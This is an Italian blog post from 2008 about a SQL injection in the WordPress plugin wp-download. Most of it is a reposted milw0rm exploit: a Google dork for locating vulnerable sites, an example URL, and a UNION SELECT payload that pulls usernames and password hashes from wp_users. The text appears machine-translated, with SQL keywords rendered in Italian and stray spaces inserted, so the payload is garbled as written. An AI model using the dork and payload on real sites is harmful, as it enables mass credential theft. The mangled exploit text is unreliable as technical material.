Vulnerabilità in un plugin per WordPress

2008 1 04 2008

Oggi il blog del mio amico Neri

I relazione su una vulnerabilità che colpisce un plugin per WordPress che si chiama wp-download
plugin è vbulnerable ad una SQL injection.

L'exploit è stato caricato a lasciare qui li codice milw0rm 

  url: http://milw0rm.com/exploits/5326 
  ################################################## ############# 
 # 
  Scarica il file # wordpress plugin remoto SQL injection 
 # 
  ################################################## ############# 
 # 
  # Autore: BL4CK 
 # 
  # Mail: bl4ck00@gmail.com 
 # 
  ################################################## ############## 
 # 
  Dork #: inurl: "wp-download.php? Dl_id =" 
 # 
  ################################################## ############## 
  Esempio: 
  http://localhost/ [percorso] / [percorso] / [percorso] / wp-download.php? dl_id = [SQL] 
 SQL: 
  null / ** / unione / ** / tutti / ** / select / ** / Concat (user_login, 0x3a, user_pass )/**/ dal / ** / wp_users / * 
  ################################################## ############## 
  # Greetz: Sion, b! B0 $ G $, h4cky0u.org 
  ################################################## ############## 

  # Milw0rm.com [2008-03-31]

"Joomla vulnerabile a SQL inyection Come il tuo sito web vale la pena?"


Azioni

Info

Lascia un commento

È possibile utilizzare questi tag: <a href="" title=""> <ABBR title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> < 's datetime = ""> <em> <i> <q Cite=""> <strike> <strong>